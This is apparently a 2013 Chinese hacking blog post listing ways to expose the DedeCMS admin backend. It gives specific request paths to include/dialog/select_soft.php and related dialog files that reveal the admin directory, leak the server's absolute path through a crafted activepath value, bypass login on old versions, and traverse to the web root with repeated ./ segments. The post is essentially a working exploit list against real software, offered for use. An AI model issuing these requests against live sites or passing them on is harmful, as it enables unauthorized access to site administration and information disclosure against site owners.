当前位置: iick's blog > 技术文章 > dedecms爆后台文件方法

dedecms爆后台文件方法

作者:hack1990 时间:13-04-11 阅读数:1071人阅读

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
 
员帐号,新版本的就直接转向了后台.
 
2.include/dialog/config.php会爆出后台管理路径
 
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
 
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
 
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
 
到根目录去.不过这些版本的访问地址有些不同.
地址为require/dialog/select_soft.php?activepath=/././././././././
 
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
include\dialog\select_images.php
include\dialog\select_media.php
include\dialog\select_templets.php​
 

# Nmap Security Scanner 7.0

上一篇:科讯 6.x~8.x getshell

下一篇:解决win7和2008连接windows 2003远程桌面很卡的问题

相关文章

评论列表

  •  
    发布于 2013-04-23 21:54:31  回复
  • 博主,现在用这些地址会提示输入后台管理目录才行。。

发表评论